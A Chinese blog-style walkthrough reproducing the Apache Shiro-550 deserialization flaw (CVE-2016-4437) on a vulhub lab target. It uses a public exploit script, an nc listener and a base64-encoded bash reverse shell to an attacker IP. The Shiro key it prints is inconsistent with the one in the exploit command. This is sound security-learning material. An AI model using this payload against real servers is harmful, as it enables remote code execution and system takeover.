Shiro-550反序列化漏洞(CVE-2016-4437)复现
本文章使用Shiro_exploit此工具复现,靶机环境为vulhub
项目地址:
https://github.com/insightglacier/Shiro_exploit
https://github.com/vulhub/vulhub
1. 搭建环境
靶机 ip:192.168.171.10
Kali ip:192.168.171.21
进入vulnhub的 shiro/CVE-2016-4437 目录,输入 docker-compose up -d 环境就搭建好了。然后输入 docker ps 就看到ip和端口了。

浏览器访问正常:

2. 复现漏洞
执行命令:
python .\shiro_exploit.py -u http://192.168.171.10:8080
发现vulnerable:True证明存在漏洞,后面是Shiro Key:
PH+bIxk5D2deZiIxcaaaA==

Kali监听本地端口
nc -lvvp 1234
将反弹shell的bash命令base64编码:
bash -i >& /dev/tcp/192.168.171.21/1234 0>&1
==>
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3MS4yMS8xMjM0IDA+JjEK}|{base64,-d}|{bash,-i}

运行脚本执行命令:
python shiro_exploit.py -u http://192.168.171.10:8080 -t 3 -p "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3MS4yMS8xMjM0IDA+JjEK}|{base64,-d}|{bash,-i}" -k "kPH+bIxk5D2deZiIxcaaaA=="

可以看到shell反弹成功:


浙公网安备 33010602011771号